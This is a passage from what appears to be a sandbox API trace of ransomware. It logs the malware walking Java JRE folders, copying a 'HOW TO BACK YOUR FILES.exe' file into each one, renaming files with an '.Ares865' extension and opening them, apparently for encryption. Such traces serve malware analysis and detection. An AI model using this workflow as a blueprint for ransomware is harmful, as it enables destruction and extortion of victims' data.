dwReserved1=0x0, cFileName="snmp.acl.template.Ares865", cAlternateFileName="SNMPAC~1.ARE")) returned 0 [0136.270] FindClose (in: hFindFile=0x2ccee8 | out: hFindFile=0x2ccee8) returned 1 [0136.271] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7af0 [0136.271] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\jfr", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\jfr") returned="C:\\Program Files (x86)\\Java\\jre7\\lib\\jfr" [0136.271] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\jfr" | out: lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\jfr") returned="C:\\Program Files (x86)\\Java\\jre7\\lib\\jfr" [0136.271] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0136.271] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\jfr\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\jfr\\how to back your files.exe"), bFailIfExists=1) returned 0 [0136.272] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0136.272] GetLastError () returned 0x0 [0136.273] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0136.273] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\jfr\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x74496dc0, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x5312d700, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5312d700, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0136.273] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0136.273] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0136.273] lstrcpyW (in: lpString1=0x2cce452, lpString2="default.jfc" | out: lpString1="default.jfc") returned="default.jfc" [0136.273] lstrlenW (lpString="default.jfc") returned 11 [0136.273] lstrlenW (lpString="Ares865") returned 7 [0136.273] lstrcmpiW (lpString1="ult.jfc", lpString2="Ares865") returned 1 [0136.273] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\jfr\\default.jfc.Ares865") returned 60 [0136.274] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\jfr\\default.jfc" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\jfr\\default.jfc"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\jfr\\default.jfc.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\jfr\\default.jfc.ares865"), dwFlags=0x1) returned 1 [0136.275] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\jfr\\default.jfc.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\jfr\\default.jfc.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0136.275] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=18574) returned 1 [0136.279] lstrcpyW (in: lpString1=0x2cce452, lpString2="profile.jfc" | out: lpString1="profile.jfc") returned="profile.jfc" [0136.279] lstrlenW (lpString="profile.jfc") returned 11 [0136.279] lstrlenW (lpString="Ares865") returned 7 [0136.279] lstrcmpiW (lpString1="ile.jfc", lpString2="Ares865") returned 1 [0136.279] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\jfr\\profile.jfc.Ares865") returned 60 [0136.279] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\jfr\\profile.jfc" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\jfr\\profile.jfc"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\jfr\\profile.jfc.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\jfr\\profile.jfc.ares865"), dwFlags=0x1) returned 1 [0136.282] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\jfr\\profile.jfc.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\jfr\\profile.jfc.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0136.282] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=18531) returned 1 [0136.285] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\images", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\images") returned="C:\\Program Files (x86)\\Java\\jre7\\lib\\images" [0136.285] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\images" | out: lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\images") returned="C:\\Program Files (x86)\\Java\\jre7\\lib\\images" [0136.286] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0136.286] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\images\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\images\\how to back your files.exe"), bFailIfExists=1) returned 0 [0136.286] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0136.287] GetLastError () returned 0x0 [0136.287] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0136.287] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\images\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x74496dc0, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x5312d700, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5312d700, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0136.287] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0136.287] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0136.287] lstrcpyW (in: lpString1=0x2cce458, lpString2="cursors" | out: lpString1="cursors") returned="cursors" [0136.287] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7ac8 [0136.287] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x68) returned 0x2d2ef0 [0136.288] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7ad0 | out: ListHead=0x2e7710, ListEntry=0x2e7ad0) returned 0x2e7ab0 [0136.288] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5312d700, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x5312d700, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0136.288] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0136.288] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5312d700, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x5312d700, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 0 [0136.288] FindClose (in: hFindFile=0x2ccee8 | out: hFindFile=0x2ccee8) returned 1 [0136.288] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7ad0 [0136.288] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\images\\cursors", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\images\\cursors") returned="C:\\Program Files (x86)\\Java\\jre7\\lib\\images\\cursors" [0136.288] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\images\\cursors" | out: lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\images\\cursors") returned="C:\\Program Files (x86)\\Java\\jre7\\lib\\images\\cursors" [0136.288] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0136.288] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\images\\cursors\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\images\\cursors\\how to back your files.exe"), bFailIfExists=1) returned 0 [0136.289] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0136.289] GetLastError () returned 0x0 [0136.289] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0136.290] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\images\\cursors\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x74496dc0, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x53153860, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x53153860, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0136.290] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0136.290] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0136.290] lstrcpyW (in: lpString1=0x2cce468, lpString2="cursors.properties" | out: lpString1="cursors.properties") returned="cursors.properties" [0136.290] lstrlenW (lpString="cursors.properties") returned 18 [0136.290] lstrlenW (lpString="Ares865") returned 7 [0136.290] lstrcmpiW (lpString1="perties", lpString2="Ares865") returned 1 [0136.290] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\images\\cursors\\cursors.properties.Ares865") returned 78 [0136.290] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\images\\cursors\\cursors.properties" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\images\\cursors\\cursors.properties"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\images\\cursors\\cursors.properties.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\images\\cursors\\cursors.properties.ares865"), dwFlags=0x1) returned 1 [0136.292] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\images\\cursors\\cursors.properties.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\images\\cursors\\cursors.properties.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0136.292] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1280) returned 1 [0136.296] lstrcpyW (in: lpString1=0x2cce468, lpString2="invalid32x32.gif" | out: lpString1="invalid32x32.gif") returned="invalid32x32.gif" [0136.296] lstrlenW (lpString="invalid32x32.gif") returned 16 [0136.296] lstrlenW (lpString="Ares865") returned 7 [0136.296] lstrcmpiW (lpString1="x32.gif", lpString2="Ares865") returned 1 [0136.296] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\images\\cursors\\invalid32x32.gif.Ares865") returned 76 [0136.296] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\images\\cursors\\invalid32x32.gif" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\images\\cursors\\invalid32x32.gif"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\images\\cursors\\invalid32x32.gif.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\images\\cursors\\invalid32x32.gif.ares865"), dwFlags=0x1) returned 1 [0136.298] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\images\\cursors\\invalid32x32.gif.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\images\\cursors\\invalid32x32.gif.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0136.298] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=153) returned 1 [0136.301] lstrcpyW (in: lpString1=0x2cce468, lpString2="win32_CopyDrop32x32.gif" | out: lpString1="win32_CopyDrop32x32.gif") returned="win32_CopyDrop32x32.gif" [0136.301] lstrlenW (lpString="win32_CopyDrop32x32.gif") returned 23 [0136.301] lstrlenW (lpString="Ares865") returned 7 [0136.301] lstrcmpiW (lpString1="x32.gif", lpString2="Ares865") returned 1 [0136.302] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\images\\cursors\\win32_CopyDrop32x32.gif.Ares865") returned 83 [0136.302] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\images\\cursors\\win32_CopyDrop32x32.gif" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\images\\cursors\\win32_copydrop32x32.gif"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\images\\cursors\\win32_CopyDrop32x32.gif.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\images\\cursors\\win32_copydrop32x32.gif.ares865"), dwFlags=0x1) returned 1 [0136.303] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\images\\cursors\\win32_CopyDrop32x32.gif.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\images\\cursors\\win32_copydrop32x32.gif.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0136.303] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=165) returned 1 [0136.306] lstrcpyW (in: lpString1=0x2cce468, lpString2="win32_CopyNoDrop32x32.gif" | out: lpString1="win32_CopyNoDrop32x32.gif") returned="win32_CopyNoDrop32x32.gif" [0136.306] lstrlenW (lpString="win32_CopyNoDrop32x32.gif") returned 25 [0136.306] lstrlenW (lpString="Ares865") returned 7 [0136.306] lstrcmpiW (lpString1="x32.gif", lpString2="Ares865") returned 1 [0136.307] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\images\\cursors\\win32_CopyNoDrop32x32.gif.Ares865") returned 85 [0136.307] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\images\\cursors\\win32_CopyNoDrop32x32.gif" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\images\\cursors\\win32_copynodrop32x32.gif"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\images\\cursors\\win32_CopyNoDrop32x32.gif.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\images\\cursors\\win32_copynodrop32x32.gif.ares865"), dwFlags=0x1) returned 1 [0136.309] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\images\\cursors\\win32_CopyNoDrop32x32.gif.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\images\\cursors\\win32_copynodrop32x32.gif.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0136.309] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=153) returned 1 [0136.312] lstrcpyW (in: lpString1=0x2cce468, lpString2="win32_LinkDrop32x32.gif" | out: lpString1="win32_LinkDrop32x32.gif") returned="win32_LinkDrop32x32.gif" [0136.312] lstrlenW (lpString="win32_LinkDrop32x32.gif") returned 23 [0136.312] lstrlenW (lpString="Ares865") returned 7 [0136.312] lstrcmpiW (lpString1="x32.gif", lpString2="Ares865") returned 1 [0136.313] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\images\\cursors\\win32_LinkDrop32x32.gif.Ares865") returned 83 [0136.313] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\images\\cursors\\win32_LinkDrop32x32.gif" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\images\\cursors\\win32_linkdrop32x32.gif"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\images\\cursors\\win32_LinkDrop32x32.gif.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\images\\cursors\\win32_linkdrop32x32.gif.ares865"), dwFlags=0x1) returned 1 [0136.317] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\images\\cursors\\win32_LinkDrop32x32.gif.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\images\\cursors\\win32_linkdrop32x32.gif.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0136.317] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=168) returned 1 [0136.320] lstrcpyW (in: lpString1=0x2cce468, lpString2="win32_LinkNoDrop32x32.gif" | out: lpString1="win32_LinkNoDrop32x32.gif") returned="win32_LinkNoDrop32x32.gif" [0136.320] lstrlenW (lpString="win32_LinkNoDrop32x32.gif") returned 25 [0136.320] lstrlenW (lpString="Ares865") returned 7 [0136.320] lstrcmpiW (lpString1="x32.gif", lpString2="Ares865") returned 1 [0136.321] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\images\\cursors\\win32_LinkNoDrop32x32.gif.Ares865") returned 85 [0136.321] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\images\\cursors\\win32_LinkNoDrop32x32.gif" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\images\\cursors\\win32_linknodrop32x32.gif"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\images\\cursors\\win32_LinkNoDrop32x32.gif.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\images\\cursors\\win32_linknodrop32x32.gif.ares865"), dwFlags=0x1) returned 1 [0136.323] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\images\\cursors\\win32_LinkNoDrop32x32.gif.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\images\\cursors\\win32_linknodrop32x32.gif.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0136.323] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=153) returned 1 [0136.326] lstrcpyW (in: lpString1=0x2cce468, lpString2="win32_MoveDrop32x32.gif" | out: lpString1="win32_MoveDrop32x32.gif") returned="win32_MoveDrop32x32.gif" [0136.326] lstrlenW (lpString="win32_MoveDrop32x32.gif") returned 23 [0136.326] lstrlenW (lpString="Ares865") returned 7 [0136.326] lstrcmpiW (lpString1="x32.gif", lpString2="Ares865") returned 1 [0136.326] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\images\\cursors\\win32_MoveDrop32x32.gif.Ares865") returned 83 [0136.326] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\images\\cursors\\win32_MoveDrop32x32.gif" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\images\\cursors\\win32_movedrop32x32.gif"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\images\\cursors\\win32_MoveDrop32x32.gif.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\images\\cursors\\win32_movedrop32x32.gif.ares865"), dwFlags=0x1) returned 1 [0136.328] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\images\\cursors\\win32_MoveDrop32x32.gif.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\images\\cursors\\win32_movedrop32x32.gif.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0136.328] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=147) returned 1 [0136.331] lstrcpyW (in: lpString1=0x2cce468, lpString2="win32_MoveNoDrop32x32.gif" | out: lpString1="win32_MoveNoDrop32x32.gif") returned="win32_MoveNoDrop32x32.gif" [0136.331] lstrlenW (lpString="win32_MoveNoDrop32x32.gif") returned 25 [0136.331] lstrlenW (lpString="Ares865") returned 7 [0136.331] lstrcmpiW (lpString1="x32.gif", lpString2="Ares865") returned 1 [0136.332] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\images\\cursors\\win32_MoveNoDrop32x32.gif.Ares865") returned 85 [0136.332] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\images\\cursors\\win32_MoveNoDrop32x32.gif" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\images\\cursors\\win32_movenodrop32x32.gif"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\images\\cursors\\win32_MoveNoDrop32x32.gif.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\images\\cursors\\win32_movenodrop32x32.gif.ares865"), dwFlags=0x1) returned 1 [0136.333] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\images\\cursors\\win32_MoveNoDrop32x32.gif.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\images\\cursors\\win32_movenodrop32x32.gif.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0136.334] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=153) returned 1 [0136.337] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\i386", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\i386") returned="C:\\Program Files (x86)\\Java\\jre7\\lib\\i386" [0136.337] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\i386" | out: lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\i386") returned="C:\\Program Files (x86)\\Java\\jre7\\lib\\i386" [0136.337] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0136.337] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\i386\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\i386\\how to back your files.exe"), bFailIfExists=1) returned 0 [0136.338] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0136.338] GetLastError () returned 0x0 [0136.339] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0136.339] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\i386\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x74496dc0, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x53153860, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x53153860, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0136.339] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0136.339] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0136.339] lstrcpyW (in: lpString1=0x2cce454, lpString2="jvm.cfg" | out: lpString1="jvm.cfg") returned="jvm.cfg" [0136.339] lstrlenW (lpString="jvm.cfg") returned 7 [0136.339] lstrlenW (lpString="Ares865") returned 7 [0136.339] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\i386\\jvm.cfg.Ares865") returned 57 [0136.340] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\i386\\jvm.cfg" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\i386\\jvm.cfg"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\i386\\jvm.cfg.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\i386\\jvm.cfg.ares865"), dwFlags=0x1) returned 1 [0136.342] CreateFileW (lpFileName="C:\\Program Files 